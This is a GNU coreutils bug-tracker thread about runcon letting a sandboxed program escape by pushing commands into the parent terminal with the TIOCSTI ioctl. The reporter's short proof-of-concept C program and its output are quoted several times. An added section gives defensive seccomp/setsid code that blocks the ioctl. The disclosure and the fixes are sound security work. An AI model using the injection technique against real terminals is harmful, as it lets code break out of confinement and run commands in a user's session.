GNU bug report logs - #24541
runcon tty hijacking via TIOCSTI ioctl


Package: coreutils;

Reported by: up201407890 <at> alunos.dcc.fc.up.pt

Date: Sun, 25 Sep 2016 15:58:02 UTC

Severity: normal

Done: Paul Eggert <eggert <at> cs.ucla.edu>

Bug is archived. No further changes may be made.

Report forwarded to bug-coreutils <at> gnu.org:
bug#24541; Package coreutils. (Sun, 25 Sep 2016 15:58:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to up201407890 <at> alunos.dcc.fc.up.pt:
New bug report received and forwarded. Copy sent to bug-coreutils <at> gnu.org. (Sun, 25 Sep 2016 15:58:02 GMT) Full text and rfc822 format available.

Message #5 received at submit <at> debbugs.gnu.org (full text, mbox):

From: up201407890 <at> alunos.dcc.fc.up.pt
To: bug-coreutils <at> gnu.org
Subject: runcon tty hijacking via TIOCSTI ioctl
Date: Sun, 25 Sep 2016 13:39:55 +0200
When executing a program via the runcon utility, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
execute arbitrary commands without the SELinux security context.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
  char *cmd = "id\n";
  while (*cmd)
    ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o test
$ runcon -t sandbox_t ./test
id
uid=1000 gid=1000 groups=1000  
context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
$ id   <--- did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Thanks,
Federico Bento.

Information forwarded to bug-coreutils <at> gnu.org:
bug#24541; Package coreutils. (Sun, 25 Sep 2016 18:50:02 GMT) Full text and rfc822 format available.

Message #8 received at 24541 <at> debbugs.gnu.org (full text, mbox):

From: Paul Eggert <eggert <at> cs.ucla.edu>
To: up201407890 <at> alunos.dcc.fc.up.pt, 24541 <at> debbugs.gnu.org,
 SE-Linux <SELinux <at> tycho.nsa.gov>
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Sun, 25 Sep 2016 11:49:40 -0700
up201407890 <at> alunos.dcc.fc.up.pt wrote re <http://bugs.gnu.org/24541>:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.

Thanks for the bug report. Surely this is a bug in the setexeccon system call, 
not in the runcon command that uses the system call. That being said, perhaps 
runcon should work around the bug via something like the attached patch.
[runcon.diff (text/x-diff, attachment)]

Information forwarded to bug-coreutils <at> gnu.org:
bug#24541; Package coreutils. (Mon, 26 Sep 2016 10:17:02 GMT) Full text and rfc822 format available.

Message #11 received at submit <at> debbugs.gnu.org (full text, mbox):

From: Pádraig Brady <P <at> draigBrady.com>
To: bug-coreutils <at> gnu.org
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 26 Sep 2016 11:16:37 +0100
On 25/09/16 12:39, up201407890 <at> alunos.dcc.fc.up.pt wrote:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.
> 
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
> 
> int main()
> {
>    char *cmd = "id\n";
>    while(*cmd)
>     ioctl(0, TIOCSTI, cmd++);
>    execlp("/bin/id", "id", NULL);
> }
> $ gcc test.c -o test
> $ runcon -t sandbox_t ./test
> id
> uid=1000 gid=1000 groups=1000  
> context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
> $ id   <--- did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
> 
> This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
> https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

There are side effects to that though, like not being able to background tasks etc.?

There's a collection of links on the issue at https://bugs.debian.org/816320

If setsid was an option, one could use `runcon ... setsid the_command`
though that would be a less secure operation by default.

The same issue impacts chroot(1) somewhat also.

I'm not sure of the best fix here.

Pádraig

Information forwarded to bug-coreutils <at> gnu.org:
bug#24541; Package coreutils. (Mon, 26 Sep 2016 10:19:02 GMT) Full text and rfc822 format available.

Message #14 received at 24541 <at> debbugs.gnu.org (full text, mbox):

From: Pádraig Brady <P <at> draigBrady.com>
To: up201407890 <at> alunos.dcc.fc.up.pt, 24541 <at> debbugs.gnu.org
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 26 Sep 2016 11:18:10 +0100
On 25/09/16 12:39, up201407890 <at> alunos.dcc.fc.up.pt wrote:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.
> 
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
> 
> int main()
> {
>    char *cmd = "id\n";
>    while(*cmd)
>     ioctl(0, TIOCSTI, cmd++);
>    execlp("/bin/id", "id", NULL);
> }
> $ gcc test.c -o test
> $ runcon -t sandbox_t ./test
> id
> uid=1000 gid=1000 groups=1000  
> context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
> $ id   <--- did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
> 
> This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
> https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

There are side effects to that though, like not being able to background tasks etc.?

There's a collection of links on the issue at https://bugs.debian.org/816320

If setsid was an option, one could use `runcon ... setsid the_command`
though that would be a less secure operation by default.

The same issue impacts chroot(1) somewhat also.

I'm not sure of the best fix here.

thanks,
Pádraig

Information forwarded to bug-coreutils <at> gnu.org:
bug#24541; Package coreutils. (Mon, 26 Sep 2016 15:13:02 GMT) Full text and rfc822 format available.

Message #17 received at 24541 <at> debbugs.gnu.org (full text, mbox):

From: up201407890 <at> alunos.dcc.fc.up.pt
To: "Paul Eggert" <eggert <at> cs.ucla.edu>
Cc: 24541 <at> debbugs.gnu.org, SE-Linux <SELinux <at> tycho.nsa.gov>
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 26 Sep 2016 08:38:11 +0200
Quoting "Paul Eggert" <eggert <at> cs.ucla.edu>:

Hello,

I sent the bug report here before I got a response from Paul Moore
https://marc.info/?l=selinux&m=147481004710264&w=2

"I don't think we need to fix this for runcon, as it isn't a
sandboxing tool like sandbox, and the loss of job control would likely
be much more noticeable for runcon."


> up201407890 <at> alunos.dcc.fc.up.pt wrote re <http://bugs.gnu.org/24541>:
>> When executing a program via the runcon utility, the nonpriv session
>> can escape to the parent session by using the TIOCSTI ioctl to push
>> characters into the terminal's input buffer, allowing an attacker to
>> execute arbitrary commands without the SELinux security context.
>
> Thanks for the bug report. Surely this is a bug in the setexeccon  
> system call, not in the runcon command that uses the system call.  
> That being said, perhaps runcon should work around the bug via  
> something like the attached patch.
>

Reply sent to Paul Eggert <eggert <at> cs.ucla.edu>:
You have taken responsibility. (Mon, 26 Sep 2016 15:54:02 GMT) Full text and rfc822 format available.

Notification sent to up201407890 <at> alunos.dcc.fc.up.pt:
bug acknowledged by developer. (Mon, 26 Sep 2016 15:54:02 GMT) Full text and rfc822 format available.

Message #22 received at 24541-done <at> debbugs.gnu.org (full text, mbox):

From: Paul Eggert <eggert <at> cs.ucla.edu>
To: up201407890 <at> alunos.dcc.fc.up.pt
Cc: 24541-done <at> debbugs.gnu.org, SE-Linux <SELinux <at> tycho.nsa.gov>
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 26 Sep 2016 08:53:34 -0700
> "I don't think we need to fix this for runcon, as it isn't a
> sandboxing tool like sandbox, and the loss of job control would likely
> be much more noticeable for runcon."

Thanks, closing the debbugs bug report.

Information forwarded to bug-coreutils <at> gnu.org:
bug#24541; Package coreutils. (Thu, 29 Sep 2016 15:17:02 GMT) Full text and rfc822 format available.

Message #25 received at 24541 <at> debbugs.gnu.org (full text, mbox):

From: Bernhard Voelker <mail <at> bernhard-voelker.de>
To: 24541 <at> debbugs.gnu.org, eggert <at> cs.ucla.edu
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Thu, 29 Sep 2016 17:15:57 +0200
On 09/26/2016 05:53 PM, Paul Eggert wrote:
>> "I don't think we need to fix this for runcon, as it isn't a
>> sandboxing tool like sandbox, and the loss of job control would likely
>> be much more noticeable for runcon."
> 
> Thanks, closing the debbugs bug report.

FWIW Karel just committed a workaround for su/runuser in util-linux
using libseccomp:

https://github.com/karelzak/util-linux/commit/8e4925016875c6a4f2ab4f833ba66f0fc57396a2

Have a nice day,
Berny

bug archived. Request was from Debbugs Internal Request <help-debbugs <at> gnu.org> to internal_control <at> debbugs.gnu.org. (Fri, 28 Oct 2016 11:24:03 GMT) Full text and rfc822 format available.

bug unarchived. Request was from Pádraig Brady <P <at> draigBrady.com> to control <at> debbugs.gnu.org. (Mon, 28 Aug 2017 09:43:02 GMT) Full text and rfc822 format available.

Information forwarded to bug-coreutils <at> gnu.org:
bug#24541; Package coreutils. (Mon, 28 Aug 2017 09:52:02 GMT) Full text and rfc822 format available.

Message #32 received at 24541-done <at> debbugs.gnu.org (full text, mbox):

From: Pádraig Brady <P <at> draigBrady.com>
To: 24541-done <at> debbugs.gnu.org
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 28 Aug 2017 02:51:12 -0700
On 29/09/16 08:15, Bernhard Voelker wrote:
> On 09/26/2016 05:53 PM, Paul Eggert wrote:
>>> "I don't think we need to fix this for runcon, as it isn't a
>>> sandboxing tool like sandbox, and the loss of job control would likely
>>> be much more noticeable for runcon."
>>
>> Thanks, closing the debbugs bug report.
> 
> FWIW Karel just committed a workaround for su/runuser in util-linux
> using libseccomp:
> 
> https://github.com/karelzak/util-linux/commit/8e492501

I think this issue is worth addressing with libseccomp.
That lib is a widely used dependency on SELinux systems
so not a significant dependency to add.
The attached uses libseccomp if available,
and falls back to using setsid() in the edge cases where not.

cheers,
Pádraig
[runcon-inject.patch (text/x-patch, attachment)]
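An added example of the two defences discussed in this thread, written for this page; it is not coreutils code and not the runcon-inject.patch attached above. It installs a seccomp filter that refuses only ioctl(TIOCSTI), so the command keeps its tty and job control, and falls back to the setsid() approach Pádraig mentions, which works because the kernel refuses TIOCSTI on a tty that is not the caller's controlling tty (absent CAP_SYS_ADMIN). It uses the raw prctl(2)/BPF seccomp interface rather than the libseccomp API, so it builds with kernel headers alone; the function names, the command-wrapper main, and the little-endian x86_64/aarch64/i386 assumption are mine. One caveat worth checking before using this in a runcon-like tool: unprivileged seccomp needs no_new_privs, and on SELinux that bit can itself constrain the exec-time domain transition that runcon is there to perform.

```c
/* Added example, not coreutils code or the attached patch: refuse TIOCSTI before
 * exec via a seccomp filter, falling back to setsid().  Raw prctl(2)/BPF interface
 * instead of libseccomp; assumes Linux on a little-endian x86_64/aarch64/i386 host. */
#define _GNU_SOURCE
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

#if defined(__x86_64__)
# define SECCOMP_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
# define SECCOMP_ARCH AUDIT_ARCH_AARCH64
#elif defined(__i386__)
# define SECCOMP_ARCH AUDIT_ARCH_I386
#else
# error "add the AUDIT_ARCH_* constant for this architecture"
#endif

/* Deny ioctl(fd, TIOCSTI, ...) with EPERM, allow everything else.  The tty and
 * job control are kept, which is the advantage over the setsid() fallback. */
int install_tiocsti_filter(void)
{
  static struct sock_filter filter[] = {
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SECCOMP_ARCH, 1, 0),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),          /* foreign ABI: kill */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_ioctl, 0, 3), /* not ioctl: allow */
    /* request = args[1]; its low 32 bits come first on little-endian hosts */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, args[1])),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, TIOCSTI, 0, 1),    /* other request: allow */
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
  };
  struct sock_fprog prog = { .len = sizeof filter / sizeof filter[0], .filter = filter };
  /* Unprivileged filters need no_new_privs; on SELinux that bit can itself
   * constrain the exec-time domain transition, so check policy before relying
   * on this path in a runcon-like tool. */
  if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
    return -1;
  return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) == 0 ? 0 : -1;
}

/* Fallback: a new session has no controlling tty, and the kernel refuses TIOCSTI
 * (EPERM) unless the tty is the caller's controlling tty or it has CAP_SYS_ADMIN.
 * Cost: job control is lost.  setsid() fails with EPERM for a process-group leader
 * (the normal case when started from a shell), so, like setsid(1), fork and let
 * the child become the session leader while the parent relays the exit status. */
int detach_from_tty(void)
{
  if (setsid() != (pid_t) -1)
    return 0;
  if (errno != EPERM)
    return -1;
  pid_t pid = fork();
  if (pid < 0)
    return -1;
  if (pid > 0) {
    int status = 0;
    while (waitpid(pid, &status, 0) != pid)
      if (errno != EINTR)
        _exit(1);
    _exit(WIFEXITED(status) ? WEXITSTATUS(status) : 128 + WTERMSIG(status));
  }
  return setsid() == (pid_t) -1 ? -1 : 0;
}

/* 1 when ioctl(0, TIOCSTI) is refused with EPERM, the outcome of both defences. */
int tiocsti_is_blocked(void)
{
  char c = 'x';             /* constructed: a byte that must never reach the tty */
  return ioctl(0, TIOCSTI, &c) == -1 && errno == EPERM;
}

/* Usage: ./tiocsti-guard COMMAND [ARG...]   (constructed name for this example) */
int main(int argc, char **argv)
{
  if (argc < 2) {
    fprintf(stderr, "usage: %s COMMAND [ARG...]\n", argv[0]);
    return 2;
  }
  if (install_tiocsti_filter() != 0 && detach_from_tty() != 0) {
    perror("cannot block TIOCSTI");
    return 1;
  }
  execvp(argv[1], argv + 1);
  perror("execvp");
  return 127;
}
```

Running the test.c from the original report under this wrapper gives the same `id` output twice from the child and nothing injected into the parent shell's input, because the filter turns the ioctl into EPERM before it reaches the tty driver. The filter matches on the request number only, so every other ioctl (window size, termios settings) still works; that is what makes it preferable to losing the controlling tty.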

Information forwarded to bug-coreutils <at> gnu.org:
bug#24541; Package coreutils. (Mon, 28 Aug 2017 11:25:02 GMT) Full text and rfc822 format available.

Message #35 received at submit <at> debbugs.gnu.org (full text, mbox):

From: Kamil Dudka <kdudka <at> redhat.com>
To: Pádraig Brady <P <at> draigbrady.com>
Cc: 24541-done <at> debbugs.gnu.org, bug-coreutils <at> gnu.org
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 28 Aug 2017 13:24:41 +0200
On Monday, August 28, 2017 11:51:12 AM CEST Pádraig Brady wrote:
> On 29/09/16 08:15, Bernhard Voelker wrote:
> > On 09/26/2016 05:53 PM, Paul Eggert wrote:
> >>> "I don't think we need to fix this for runcon, as it isn't a
> >>> sandboxing tool like sandbox, and the loss of job control would likely
> >>> be much more noticeable for runcon."
> >> 
> >> Thanks, closing the debbugs bug report.
> > 
> > FWIW Karel just committed a workaround for su/runuser in util-linux
> > using libseccomp:
> > 
> > https://github.com/karelzak/util-linux/commit/8e492501

Note that the above mentioned commit was reverted a long time ago:

https://github.com/karelzak/util-linux/commit/23f75093

Kamil

> I think this issue is worth addressing with libseccomp.
> That lib is a widely used dependency on SELinux systems
> so not a significant dependency to add.
> The attached uses libseccomp if available,
> and falls back to using setsid() in the edge cases where not.
> 
> cheers,
> Pádraig

Information forwarded to bug-coreutils <at> gnu.org:
bug#24541; Package coreutils. (Mon, 28 Aug 2017 11:25:02 GMT) Full text and rfc822 format available.

bug archived. Request was from Debbugs Internal Request <help-debbugs <at> gnu.org> to internal_control <at> debbugs.gnu.org. (Tue, 26 Sep 2017 11:24:03 GMT) Full text and rfc822 format available.